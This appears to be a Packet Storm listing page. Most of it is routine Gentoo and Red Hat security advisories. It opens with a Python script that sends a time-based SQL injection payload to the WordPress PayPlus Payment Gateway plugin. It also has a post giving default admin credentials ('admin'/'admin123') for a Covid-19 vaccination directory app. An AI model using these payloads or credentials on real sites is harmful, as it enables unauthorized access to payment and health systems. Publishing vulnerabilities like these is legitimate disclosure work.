WordPress PayPlus Payment Gateway plugin versions prior to 6.6.9 suffer from a remote SQL injection vulnerability.

    #!/usr/bin/env python3.11import requestsimport timedef exploit(url):    payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}    start = time.time()    with requests.Session() as session:        session.headers.update({            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        })        response = requests.get(url, params=payload)        print(f"Exploiting {url}...")        end = time.time()        print(response.status_code)        response_time = end - start        print(f"Response time: {response_time}...")if __name__ == "__main__":    url = input("Enter the vulnerable URL (e.g., https://test.site): ")    if not url.startswith("http"):        url = "http://" + url    exploit(url)

WordPress PayPlus Payment Gateway SQL Injection

Gentoo Linux Security Advisory 202408-12 - A vulnerability has been discovered in Bitcoin, which can lead to a denial of service. Versions greater than or equal to 25.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Bitcoin: Denial of Service  
     Date: August 07, 2024  
     Bugs: #908084  
       ID: 202408-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Bitcoin, which can lead to a  
denial of service.

Background  
==========

Bitcoin Core consists of both "full-node" software for fully validating  
the blockchain as well as a bitcoin wallet.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-p2p/bitcoind  < 25.0        >= 25.0

Description  
===========

Please review the CVE identifier referenced below for details.

Impact  
======

Bitcoin Core, when debug mode is not used, allows attackers to cause a  
denial of service (CPU consumption) because draining the inventory-to-  
send queue is inefficient, as exploited in the wild in May 2023.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Bitcoin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-p2p/bitcoind-25.0"

References  
==========

[ 1 ] CVE-2023-33297  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33297

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-12

Gentoo Linux Security Advisory 202408-11 - Multiple vulnerabilities have been discovered in aiohttp, the worst of which could lead to service compromise. Versions greater than or equal to 3.9.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: aiohttp: Multiple Vulnerabilities  
     Date: August 07, 2024  
     Bugs: #918541, #918968, #931097  
       ID: 202408-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in aiohttp, the worst of  
which could lead to service compromise.

Background  
==========

aiohttp is an asynchronous HTTP client/server framework for asyncio and  
Python.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
dev-python/aiohttp  < 3.9.4       >= 3.9.4

Description  
===========

Multiple vulnerabilities have been discovered in aiohttp. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All aiohttp users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/aiohttp-3.9.4"

References  
==========

[ 1 ] CVE-2023-47641  
      https://nvd.nist.gov/vuln/detail/CVE-2023-47641  
[ 2 ] CVE-2023-49082  
      https://nvd.nist.gov/vuln/detail/CVE-2023-49082  
[ 3 ] CVE-2024-30251  
      https://nvd.nist.gov/vuln/detail/CVE-2024-30251

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-11

Gentoo Linux Security Advisory 202408-10 - Multiple vulnerabilities have been discovered in nghttp2, the worst of which could lead to a denial of service. Versions greater than or equal to 1.61.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: nghttp2: Multiple Vulnerabilities  
     Date: August 07, 2024  
     Bugs: #915554, #928541  
       ID: 202408-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in nghttp2, the worst of  
which could lead to a denial of service.

Background  
==========

Nghttp2 is an implementation of HTTP/2 and its header compression  
algorithm HPACK in C.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-libs/nghttp2  < 1.61.0      >= 1.61.0

Description  
===========

Multiple vulnerabilities have been discovered in nghttp2. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All nghttp2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/nghttp2-1.61.0"

References  
==========

[ 1 ] CVE-2023-44487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44487  
[ 2 ] CVE-2024-28182  
      https://nvd.nist.gov/vuln/detail/CVE-2024-28182

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-10

Gentoo Linux Security Advisory 202408-9 - Multiple vulnerabilities have been discovered in Cairo, the worst of which a denial of service. Versions greater than or equal to 1.18.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Cairo: Multiple Vulnerabilities  
     Date: August 07, 2024  
     Bugs: #717778  
       ID: 202408-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Cairo, the worst of  
which a denial of service.

Background  
==========

Cairo is a 2D vector graphics library with cross-device output support.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
x11-libs/cairo  < 1.18.0      >= 1.18.0

Description  
===========

Multiple vulnerabilities have been discovered in Cairo. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Cairo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-libs/cairo-1.18.0"

References  
==========

[ 1 ] CVE-2019-6461  
      https://nvd.nist.gov/vuln/detail/CVE-2019-6461  
[ 2 ] CVE-2019-6462  
      https://nvd.nist.gov/vuln/detail/CVE-2019-6462

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-09

Gentoo Linux Security Advisory 202408-8 - A vulnerability has been discovered in json-c, which can lead to a stack buffer overflow. Versions greater than or equal to 0.16 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: json-c: Buffer Overflow  
     Date: August 07, 2024  
     Bugs: #918555  
       ID: 202408-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in json-c, which can lead to a stack  
buffer overflow.

Background  
==========

json-c is a JSON implementation in C.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
dev-libs/json-c  < 0.16        >= 0.16

Description  
===========

Please review the CVE identifier referenced below for details.

Impact  
======

A stack-buffer-overflow exists in the auxiliary sample program  
json_parse which is located in the function parseit.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All json-c users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/json-c-0.16"

References  
==========

[ 1 ] CVE-2021-32292  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32292

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-08

Gentoo Linux Security Advisory 202408-7 - Multiple vulnerabilities have been discovered in Go, the worst of which could lead to information leakage or a denial of service. Versions greater than or equal to 1.22.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Go: Multiple Vulnerabilities  
     Date: August 07, 2024  
     Bugs: #906043, #919310, #926530, #928539, #931602  
       ID: 202408-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Go, the worst of which  
could lead to information leakage or a denial of service.

Background  
==========

Go is an open source programming language that makes it easy to build  
simple, reliable, and efficient software.

Affected packages  
=================

Package      Vulnerable    Unaffected  
-----------  ------------  ------------  
dev-lang/go  < 1.22.3      >= 1.22.3

Description  
===========

Multiple vulnerabilities have been discovered in Go. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Go users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-lang/go-1.22.3"

Due to Go programs typically being statically compiled, Go users should  
also recompile the reverse dependencies of the Go language to ensure  
statically linked programs are remediated:

  # emerge --ask --oneshot --verbose @golang-rebuild

References  
==========

[ 1 ] CVE-2023-24539  
      https://nvd.nist.gov/vuln/detail/CVE-2023-24539  
[ 2 ] CVE-2023-24540  
      https://nvd.nist.gov/vuln/detail/CVE-2023-24540  
[ 3 ] CVE-2023-29400  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29400  
[ 4 ] CVE-2023-39326  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39326  
[ 5 ] CVE-2023-45283  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45283  
[ 6 ] CVE-2023-45285  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45285  
[ 7 ] CVE-2023-45288  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45288  
[ 8 ] CVE-2023-45289  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45289  
[ 9 ] CVE-2023-45290  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45290  
[ 10 ] CVE-2024-24783  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24783  
[ 11 ] CVE-2024-24784  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24784  
[ 12 ] CVE-2024-24785  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24785  
[ 13 ] CVE-2024-24788  
      https://nvd.nist.gov/vuln/detail/CVE-2024-24788

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-07

Red Hat Security Advisory 2024-5025-03 - Red Hat JBoss Web Server 5.8.1 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5025.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Web Server 5.8.1 release and security updateAdvisory ID:        RHSA-2024:5025-03Product:            Red Hat JBoss Web ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5025Issue date:         2024-08-06Revision:           03CVE Names:          CVE-2024-34750====================================================================Summary: Red Hat JBoss Web Server 5.8.1 zip release is now available for Red Hat Enterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9, and Windows Server.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.This release of Red Hat JBoss Web Server 5.8.1 serves as a replacement for Red Hat JBoss Web Server 5.8.0. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes that are linked to in the References section.Security Fix(es):* jws5-tomcat: Improper Handling of Exceptional Conditions (CVE-2024-34750)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2024-34750References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.redhat.com/en/documentation/red_hat_jboss_web_server/5.8/html-single/red_hat_jboss_web_server_5.8_service_pack_1_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2295651

Red Hat Security Advisory 2024-5025-03

Gentoo Linux Security Advisory 202408-5 - Multiple vulnerabilities have been discovered in Redis, the worst of which may lead to a denial of service or possible remote code execution. Versions greater than or equal to 7.2.4 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202408-05- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal    Title: Redis: Multiple Vulnerabilities     Date: August 07, 2024     Bugs: #891169, #898464, #902501, #904486, #910191, #913741, #915989, #921662       ID: 202408-05- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis========Multiple vulnerabilities have been discovered in Redis, the worst ofwhich may lead to a denial of service or possible remote code execution.Background==========Redis is an open source (BSD licensed), in-memory data structure store,used as a database, cache and message broker.Affected packages=================Package       Vulnerable    Unaffected------------  ------------  ------------dev-db/redis  < 7.2.4       >= 7.2.4Description===========Multiple vulnerabilities have been discovered in Redis. Please reviewthe CVE identifiers referenced below for details.Impact======Please review the referenced CVE identifiers for details.Workaround==========There is no known workaround at this time.Resolution==========All Redis users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=dev-db/redis-7.2.4"References==========[ 1 ] CVE-2022-24834      https://nvd.nist.gov/vuln/detail/CVE-2022-24834[ 2 ] CVE-2022-35977      https://nvd.nist.gov/vuln/detail/CVE-2022-35977[ 3 ] CVE-2022-36021      https://nvd.nist.gov/vuln/detail/CVE-2022-36021[ 4 ] CVE-2023-22458      https://nvd.nist.gov/vuln/detail/CVE-2023-22458[ 5 ] CVE-2023-25155      https://nvd.nist.gov/vuln/detail/CVE-2023-25155[ 6 ] CVE-2023-28425      https://nvd.nist.gov/vuln/detail/CVE-2023-28425[ 7 ] CVE-2023-28856      https://nvd.nist.gov/vuln/detail/CVE-2023-28856[ 8 ] CVE-2023-36824      https://nvd.nist.gov/vuln/detail/CVE-2023-36824[ 9 ] CVE-2023-41053      https://nvd.nist.gov/vuln/detail/CVE-2023-41053[ 10 ] CVE-2023-41056      https://nvd.nist.gov/vuln/detail/CVE-2023-41056[ 11 ] CVE-2023-45145      https://nvd.nist.gov/vuln/detail/CVE-2023-45145Availability============This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202408-05Concerns?=========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License=======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-05

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

Posted Aug 7, 2024

Authored by indoushka

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 8c38f4e680e6513d62d4303a51a4d7e3eaa5a7bb80e3e87ce8e510bba268a0b9

Download | Favorite | View

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Covid-19 Directory on Vaccination System v1.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,289)
*   Arbitrary (16,852)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,792)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,386)
*   DoS (25,050)
*   Encryption (2,389)
*   Exploit (53,137)
*   File Inclusion (4,259)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,889)
*   Intrusion Detection (915)
*   Java (3,143)
*   JavaScript (896)
*   Kernel (7,191)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,167)
*   Perl (1,435)
*   PHP (5,222)
*   Proof of Concept (2,382)
*   Protocol (3,724)
*   Python (1,635)
*   Remote (31,646)
*   Root (3,635)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,605)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,941)
*   Web (9,960)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,090)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,547)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,646)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,459)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,729)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,670)
*   Other

Tag

#web